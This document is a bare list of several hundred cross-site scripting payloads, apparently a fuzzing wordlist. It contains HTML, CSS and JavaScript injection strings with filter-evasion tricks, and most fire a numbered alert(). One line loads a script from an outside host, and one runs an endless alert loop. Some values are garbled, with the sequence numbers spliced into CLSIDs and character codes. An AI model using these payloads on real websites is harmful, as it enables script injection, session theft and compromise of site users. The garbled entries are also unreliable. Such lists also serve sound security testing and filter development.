<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1707)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1708)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-17091709D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1709)"></OBJECT>
<b <script>alert(1712)</script>0
<div id="div1713"><input value="``onmouseover=javascript:alert(1713)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1713").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1714)//'>
<embed src="javascript:alert(1715)">
<img src="javascript:alert(1716)">
<image src="javascript:alert(1717)">
<script src="javascript:alert(1718)">
<div style=width:1719px;filter:glow onfilterchange=javascript:alert(1719)>x
<? foo="><script>javascript:alert(1720)</script>">
<! foo="><script>javascript:alert(1721)</script>">
</ foo="><script>javascript:alert(1722)</script>">
<? foo="><x foo='?><script>javascript:alert(1723)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1724)</script>">
<% foo><x foo="%><script>javascript:alert(1725)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1726)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1727)">
<img \x47src=x onerror="javascript:alert(1728)">
<img \x17291729src=x onerror="javascript:alert(1729)">
<img \x17302src=x onerror="javascript:alert(1730)">
<img\x47src=x onerror="javascript:alert(1731)">
<img\x17320src=x onerror="javascript:alert(1732)">
<img\x17333src=x onerror="javascript:alert(1733)">
<img\x32src=x onerror="javascript:alert(1734)">
<img\x47src=x onerror="javascript:alert(1735)">
<img\x17361736src=x onerror="javascript:alert(1736)">
<img \x47src=x onerror="javascript:alert(1737)">
<img \x34src=x onerror="javascript:alert(1738)">
<img \x39src=x onerror="javascript:alert(1739)">
<img \x00src=x onerror="javascript:alert(1740)">
<img src\x09=x onerror="javascript:alert(1741)">
<img src\x17420=x onerror="javascript:alert(1742)">
<img src\x17433=x onerror="javascript:alert(1743)">
<img src\x32=x onerror="javascript:alert(1744)">
<img src\x17452=x onerror="javascript:alert(1745)">
<img src\x17461746=x onerror="javascript:alert(1746)">
<img src\x00=x onerror="javascript:alert(1747)">
<img src\x47=x onerror="javascript:alert(1748)">
<img src=x\x09onerror="javascript:alert(1749)">
<img src=x\x17500onerror="javascript:alert(1750)">
<img src=x\x17511751onerror="javascript:alert(1751)">
<img src=x\x17522onerror="javascript:alert(1752)">
<img src=x\x17533onerror="javascript:alert(1753)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1754)">
<img src=x onerror=\x09"javascript:alert(1755)">
<img src=x onerror=\x17560"javascript:alert(1756)">
<img src=x onerror=\x17571757"javascript:alert(1757)">
<img src=x onerror=\x17582"javascript:alert(1758)">
<img src=x onerror=\x32"javascript:alert(1759)">
<img src=x onerror=\x00"javascript:alert(1760)">
<a href=java&#1761&#2&#3&#4&#5&#6&#7&#8&#17611761&#17612script:javascript:alert(1761)>XXX</a>
<img src="x` `<script>javascript:alert(1762)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1763)//">
<title onpropertychange=javascript:alert(1764)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1765)></a>">
<!--[if]><script>javascript:alert(1766)</script -->
<!--[if<img src=x onerror=javascript:alert(1767)//]> -->
<object id="x" classid="clsid:CB927D17702-4FF7-4a9e-A177069-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17707-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1770)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1771)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1772)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1773))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1774))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1775);">XXX</a></a><a href="javascript:javascript:alert(1775)">XXX</a>
<// style=x:expression\28javascript:alert(1779)\29>
<style>*{x:expression(javascript:alert(1780))}</style>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1782));">X
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1788)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1789))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1790)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1791)')()</script>
<meta charset="mac-farsi">¼script¾javascript:alert(1794)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1795)` >
1796<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41796vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1796)&gt;`>
1797<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1797)&gt;>
1799<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1799) strokecolor=white strokeweight=1799000px from=0 to=1799000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1800)">XXX</a>
<event-source src="%(event)s" onload="javascript:alert(1803)">
<a href="javascript:javascript:alert(1804)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#18051805;src=x:x&#18051805;onerror&#18051805;=javascript:alert(1805)&gt;">
<script>javascript:alert(1809)</script>
<IMG SRC="javascript:javascript:alert(1810);">
<IMG SRC=javascript:javascript:alert(1811)>
<IMG SRC=`javascript:javascript:alert(1812)`>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1814);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1815)>
<BODY ONLOAD=javascript:javascript:alert(1816)>
<IMG SRC="jav ascript:javascript:alert(1817);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1818)>
<IMG SRC="javascript:javascript:alert(1821)"
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1823);">
<IMG DYNSRC="javascript:javascript:alert(1824)">
<IMG LOWSRC="javascript:javascript:alert(1825)">
<BGSOUND SRC="javascript:javascript:alert(1826);">
<BR SIZE="&{javascript:alert(1827)}">
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1829);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(1833)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1834);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1835);">
<IFRAME SRC="javascript:javascript:alert(1836);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1837)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1838)">
<DIV STYLE="background-image: url(javascript:javascript:alert(1839))">
<DIV STYLE="width:expression(javascript:alert(1840));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1841))">
<XSS STYLE="xss:expression(javascript:alert(1842))">
<STYLE TYPE="text/javascript">javascript:alert(1843);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1844)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1845)")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:alert(1846);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(1847);//">
<OBJECT classid=clsid:ae24fdae-03c6-18491849d1849-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1849)></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1850)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1851)&lt;/SCRIPT&gt;"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1854)">X
<body onscroll=javascript:alert(1855)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1856)">
<STYLE>a{background:url('s1858' 's2)}@import javascript:javascript:alert(1858);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1859)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1860);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1861);></style>
<?xml version="1862.0"?><html:html xmlns:html='http://www.w3.org/1862999/xhtml'><html:script>javascript:alert(1862);</html:script></html:html>
<embed code=javascript:javascript:alert(1864);></embed>
<frameset onload=javascript:javascript:alert(1866)></frameset>
<object onerror=javascript:javascript:alert(1867)>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1869);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1870);};>
<a href="jav&#65ascript:javascript:alert(1871)">test1871</a>
<a href="jav&#97ascript:javascript:alert(1872)">test1872</a>
<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1874)&amp;gt;>">
';alert(1875))//';alert(1875))//";
alert(1876))//";alert(1876))//--
></SCRIPT>">'><SCRIPT>alert(1877))</SCRIPT>
<IMG SRC="javascript:alert(1880);">
<IMG SRC=javascript:alert(1881)>
<IMG SRC=JaVaScRiPt:alert(1882)>
<IMG SRC=javascript:alert(1883)>
<IMG SRC=`javascript:alert(1884)`>
<a onmouseover="alert(1885)">xxs link</a>
<a onmouseover=alert(1886)>xxs link</a>
<IMG """><SCRIPT>alert(1887)</SCRIPT>">
<IMG SRC=javascript:alert(1888))>
<IMG SRC=# onmouseover="alert(1889)">
<IMG SRC= onmouseover="alert(1890)">
<IMG onmouseover="alert(1891)">
<IMG SRC="jav ascript:alert(1895);">
<IMG SRC="jav&#x09;ascript:alert(1896);">
<IMG SRC="jav&#x0A;ascript:alert(1897);">
<IMG SRC="jav&#x0D;ascript:alert(1898);">
perl -e 'print "<IMG SRC=java\0script:alert(1899)>";' > out
<IMG SRC=" &#14;  javascript:alert(1900);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1902)>
<<SCRIPT>alert(1904);//<</SCRIPT>
<IMG SRC="javascript:alert(1907)"
\";alert(1909);//
</TITLE><SCRIPT>alert(1910);</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1911);">
<BODY BACKGROUND="javascript:alert(1912)">
<IMG DYNSRC="javascript:alert(1913)">
<IMG LOWSRC="javascript:alert(1914)">
<STYLE>li {list-style-image: url("javascript:alert(1915)");}</STYLE><UL><LI>XSS</br>
<BODY ONLOAD=alert(1918)>
<BGSOUND SRC="javascript:alert(1919);">
<BR SIZE="&{alert(1920)}">
<LINK REL="stylesheet" HREF="javascript:alert(1921);">
<STYLE>@im\port'\ja\vasc\ript:alert(1926)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(1927))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(1928))'>
<STYLE TYPE="text/javascript">alert(1929);</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(1930)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(1931)")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert(1932)")}</STYLE>
<XSS STYLE="xss:expression(alert(1933))">
¼script¾alert(1935)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1936);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1938);">
<IFRAME SRC="javascript:alert(1939);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(1940)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(1941);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1942)">
<TABLE><TD BACKGROUND="javascript:alert(1943)">
<DIV STYLE="background-image: url(javascript:alert(1944))">
<DIV STYLE="background-image: url(&#1;javascript:alert(1946))">
<DIV STYLE="width: expression(alert(1947));">
<BASE HREF="javascript:alert(1948);//">
<? echo('<SCR)';echo('IPT>alert(1953)</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1956)</SCRIPT>">
 <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1957);+ADw-/SCRIPT+AD4-
<img src=``&NewLine; onerror=alert(1977)&NewLine;
<script /**/>/**/alert(1981)/**/</script /**/
<iframe/src="data:text/html,<svg &#198319831983;&#198319830;load=alert(1983)>">
<meta content="&NewLine; 1984 &NewLine;; JAVASCRIPT&colon; alert(1984)" http-equiv="refresh"/>
<form><iframe &#09;&#19920;&#19921992; src="javascript&#58;alert(1992)"&#19921992;&#19920;&#09;;>
http://www.google<script .com>alert(1994)</script
<script ^__^>alert(1998))</script ^__^
</style &#32;><script &#32; :-(>/**/alert(1999)/**/</script &#32; :-(
&#00;</form><input type&#62000;"date" onfocus="alert(2000)">
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(2004)&NewLine;>X</a>
<script ~~~>alert(2005)</script ~~~>
<iframe// src=javaSCRIPT&colon;alert(2013)
<%<!--'%><script>alert(2030);</script -->
<script src="data:text/javascript,alert(2031)"></script>
<iframe/onreadystatechange=alert(2033)
<svg/onload=alert(2034)
<input type="text" value=`` <div/onmouseover='alert(2036)'>X</div>
<img src=`xx:xx`onerror=alert(2038)>
<meta http-equiv="refresh" content="0;javascript&colon;alert(2040)"/>
<script>+-+-2050-+-+alert(2050)</script>
<body/onload=&lt;!--&gt;&#20510alert(2051)>
<script itworksinallbrowsers>/*<script* */alert(2052)</script
<img src ?itworksonchrome?\/onerror = alert(2053)
<svg><script onlypossibleinopera:-)> alert(2055)
<script x> alert(2057) </script 2057=2
<div/onmouseover='alert(2058)'> style="x:">
<--`<img/src=` onerror=alert(2059)> --!>
<div style="position:absolute;top:0;left:0;width:206100%;height:206100%" onmouseover="prompt(2061)" onclick="alert(2061)">x</button>
<form><button formaction=javascript&colon;alert(2063)>CLICKME
<script>alert(2071);</script>
<script>alert(2072);</script>
<IMG SRC="javascript:alert(2073);">
<IMG SRC=javascript:alert(2074)>
<IMG SRC=javascript:alert(2075)>
<IMG SRC=javascript:alert(2076)>
<IMG """><SCRIPT>alert(2077)</SCRIPT>">
<scr<script>ipt>alert(2078);</scr</script>ipt>
<script>alert(2079))</script>
<img src=foo.png onerror=alert(2080) />
<style>@im\port'\ja\vasc\ript:alert(2081)';</style>
<? echo('<scr)'; echo('ipt>alert(2082)</script>'); ?>
<marquee><script>alert(2083)</script></marquee>
<IMG SRC=\"jav&#x09;ascript:alert(2084);\">
<IMG SRC=\"jav&#x0A;ascript:alert(2085);\">
<IMG SRC=\"jav&#x0D;ascript:alert(2086);\">
<IMG SRC=javascript:alert(2087))>
"><script>alert(2088)</script>
</title><script>alert(2090)</script>
</textarea><script>alert(2091)</script>
<IMG LOWSRC=\"javascript:alert(2092)\">
<IMG DYNSRC=\"javascript:alert(2093)\">
<font style='color:expression(alert(2094))'>
<img src="javascript:alert(2095)">
<script language="JavaScript">alert(2096)</script>
<body onunload="javascript:alert(2097);">
<body onLoad="alert(2098);"
[color=red' onmouseover="alert(2099)"]mouse over[/color]
"/></a></><img src=2100.gif onerror=alert(2100)>
window.alert(2101);
alert(2103));'))">
<iframe<?php echo chr(11)?> onload=alert(2104)></iframe>
"><script alert(2105))</script>
'">><script>alert(2107)</script>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(2109);\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(2110);\">
<script>2111 2111 = 1; alert(2111)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert(2112)")}</STYLE>
<?='<SCRIPT>alert(2113)</SCRIPT>'?>
" onfocus=alert(2115) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert(2116);\"></FRAMESET>
<STYLE>li {list-style-image: url(\"javascript:alert(2117)\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(2118)</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(2119)>\";' > out
<br size=\"&{alert(2120)}\">
<scrscriptipt>alert(2121)</scrscriptipt>
</br style=a:expression(alert(21222122>
</script><script>alert(2123)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2124)>
[color=red width=expression(alert(2125))][color]
<BASE HREF="javascript:alert(2126);//">
"></iframe><script>alert(2128)</script>
<body onLoad="while(true) alert(2129);">
'"></title><script>alert(2130)</script>
</textarea>'"><script>alert(2131)</script>
'""><script language="JavaScript"> alert(2132);</script>
</script></script><<<<script><>>>><<<script>alert(2133)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert(2135);">
'></select><script>alert(2136)</script>
a="get";b="URL";c="javascript:";d="alert(2140);";eval(a+b+c+d);
='><script>alert(2141)</script>
<body background=javascript:'"><script>alert(2143)</script>></body>
">/XaDoS/><script>alert(2144)</script><script src="http://www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(2145)</script>
!--" /><script>alert(2148);</script>
<script>alert(2149)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(2150)</script>><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert(2151)</script>><marquee><h1>XSS by xss</h1></marquee>
<img """><script>alert(2152)</script><marquee><h1>XSS by xss</h1></marquee>
<script>alert(2153)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(2154)</script>"><script>alert("XSS by \nxss</h1></marquee>
'"></title><script>alert(2155)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src="javascript:alert(2156);"></iframe><marquee><h1>XSS by xss</h1></marquee>
'><SCRIPT>alert(2157))</SCRIPT><img src="" alt='
"><SCRIPT>alert(2158))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(2159))</SCRIPT><img src="" alt=\'
'); alert(2162); var x='
\\'); alert(2163);var x=\'
//--></SCRIPT><SCRIPT>alert(2164));
>"><ScRiPt%20%0a%0d>alert(2165)%3B</ScRiPt>
<SCRIPT> alert(2170); </SCRIPT>
<BODY ONLOAD=alert(2171)>
<BODY BACKGROUND="javascript:alert(2172)">
<IMG SRC="javascript:alert(2173);">
<IMG DYNSRC="javascript:alert(2174)">
<IMG LOWSRC="javascript:alert(2175)">
<INPUT TYPE="IMAGE" SRC="javascript:alert(2177);">
<LINK REL="stylesheet" HREF="javascript:alert(2178);">
<TABLE BACKGROUND="javascript:alert(2179)">
<TD BACKGROUND="javascript:alert(2180)">
<DIV STYLE="background-image: url(javascript:alert(2181))">
<DIV STYLE="width: expression(alert(2182));">
&apos;;alert(2185))//\&apos;;alert(2185))//&quot;;alert(2185))//\&quot;;alert(2185))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(2185))&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert(2187)&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert(2189))&lt;/SCRIPT&gt;
&lt;BASE HREF=&quot;javascript:alert(2190);//&quot;&gt;
&lt;BGSOUND SRC=&quot;javascript:alert(2191);&quot;&gt;
&lt;BODY BACKGROUND=&quot;javascript:alert(2192);&quot;&gt;
&lt;BODY ONLOAD=alert(2193)&gt;
&lt;DIV STYLE=&quot;background-image: url(javascript:alert(2194))&quot;&gt;
&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(2195))&quot;&gt;
&lt;DIV STYLE=&quot;width: expression(alert(2196));&quot;&gt;
&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(2197);&quot;&gt;&lt;/FRAMESET&gt;
&lt;IFRAME SRC=&quot;javascript:alert(2198);&quot;&gt;&lt;/IFRAME&gt;
&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(2199);&quot;&gt;
&lt;IMG SRC=&quot;javascript:alert(2200);&quot;&gt;
&lt;IMG SRC=javascript:alert(2201)&gt;
&lt;IMG DYNSRC=&quot;javascript:alert(2202);&quot;&gt;
&lt;IMG LOWSRC=&quot;javascript:alert(2203);&quot;&gt;
&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(2207)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
%BCscript%BEalert(2211)%BC/script%BE
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(2212);&quot;&gt;
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(2214);&quot;&gt;
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(2217)&gt;&lt;/OBJECT&gt;
a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(2219);&quot;)&quot;;&#10;eval(a+b+c+d);
&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(2220);&lt;/STYLE&gt;
&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(2221))&quot;&gt;
&lt;XSS STYLE=&quot;xss:expression(alert(2222))&quot;&gt;
&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(2223)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(2224)&quot;)}&lt;/STYLE&gt;
&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(2225);&quot;&gt;
&lt;TABLE BACKGROUND=&quot;javascript:alert(2230)&quot;&gt;&lt;/TABLE&gt;
&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(2231)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(2233);&quot;&gt;]]&gt;
&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(2234)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(2238)&lt;/SCRIPT&gt;&quot;&gt;
&lt;BR SIZE=&quot;&amp;{alert(2243)}&quot;&gt;
&lt;IMG SRC=JaVaScRiPt:alert(2244)&gt;
&lt;IMG SRC=javascript:alert(2245)&gt;
&lt;IMG SRC=`javascript:alert(2246)`&gt;
&lt;IMG SRC=javascript:alert(2247))&gt;
&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(2252);+ADw-/SCRIPT+AD4-
\&quot;;alert(2253);//
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(2254);&lt;/SCRIPT&gt;
&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(2255)&apos;;&lt;/STYLE&gt;
&lt;IMG SRC=&quot;jav&#x09;ascript:alert(2256);&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(2257);&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(2258);&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(2259);&quot;&gt;
perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(2261)>&quot;;&apos;&gt; out
perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(2262)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out
&lt;IMG SRC=&quot; &amp;#14;  javascript:alert(2263);&quot;&gt;
&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(2265)&gt;
&lt;IMG SRC=&quot;javascript:alert(2268)&quot;
&lt;&lt;SCRIPT&gt;alert(2270);//&lt;&lt;/SCRIPT&gt;
&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(2271)&lt;/SCRIPT&gt;&quot;&gt;
&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(2390)&gt;
&lt;/script&gt;&lt;script&gt;alert(2391)&lt;/script&gt;
&lt;/br style=a:expression(alert(23922392&gt;
&lt;scrscriptipt&gt;alert(2393)&lt;/scrscriptipt&gt;
&lt;br size=\&quot;&amp;{alert(2394)}\&quot;&gt;
perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(2395)&gt;\&quot;;&#039; &gt; out
perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(2396)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2397))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2399))>
<~/XSS STYLE=xss:expression(alert(2400))>
"><script>alert(2401)</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert(2402))>
XSS/*-*/STYLE=xss:e/**/xpression(alert(2403))>
XSS STYLE=xss:e/**/xpression(alert(2404))>
</XSS STYLE=xss:expression(alert(2405))>
';;alert(2406))//\';;alert(2406))//";;alert(2406))//\";;alert(2406))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(2406))<;/SCRIPT>;
<;SCRIPT>;alert(2408)<;/SCRIPT>;
<;SCRIPT>;alert(2410))<;/SCRIPT>;
<;BASE HREF=";javascript:alert(2411);//";>;
<;BGSOUND SRC=";javascript:alert(2412);";>;
<;BODY BACKGROUND=";javascript:alert(2413);";>;
<;BODY ONLOAD=alert(2414)>;
<;DIV STYLE=";background-image: url(javascript:alert(2415))";>;
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(2416))";>;
<;DIV STYLE=";width: expression(alert(2417));";>;
<;FRAMESET>;<;FRAME SRC=";javascript:alert(2418);";>;<;/FRAMESET>;
<;IFRAME SRC=";javascript:alert(2419);";>;<;/IFRAME>;
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(2420);";>;
<;IMG SRC=";javascript:alert(2421);";>;
<;IMG SRC=javascript:alert(2422)>;
<;IMG DYNSRC=";javascript:alert(2423);";>;
<;IMG LOWSRC=";javascript:alert(2424);";>;
<;STYLE>;li {list-style-image: url(";javascript:alert(2428)";);}<;/STYLE>;<;UL>;<;LI>;XSS
%BCscript%BEalert(2432)%BC/script%BE
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(2433);";>;
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(2435);";>;
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(2438)>;<;/OBJECT>;
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(2440);";)";;&#10;eval(a+b+c+d);
<;STYLE TYPE=";text/javascript";>;alert(2441);<;/STYLE>;
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(2442))";>;
<;XSS STYLE=";xss:expression(alert(2443))";>;
<;STYLE>;.XSS{background-image:url(";javascript:alert(2444)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(2445)";)}<;/STYLE>;
<;LINK REL=";stylesheet"; HREF=";javascript:alert(2446);";>;
<;TABLE BACKGROUND=";javascript:alert(2451)";>;<;/TABLE>;
<;TABLE>;<;TD BACKGROUND=";javascript:alert(2452)";>;<;/TD>;<;/TABLE>;
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(2454);";>;]]>;
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(2455)";>;<;/B>;<;/I>;<;/XML>;
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(2459)<;/SCRIPT>;";>;
<;BR SIZE=";&;{alert(2464)}";>;
<;IMG SRC=JaVaScRiPt:alert(2465)>;
<;IMG SRC=javascript:alert(2466)>;
<;IMG SRC=`javascript:alert(2467)`>;
<;IMG SRC=javascript:alert(2468))>;
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(2473);+ADw-/SCRIPT+AD4-
\";;alert(2474);//
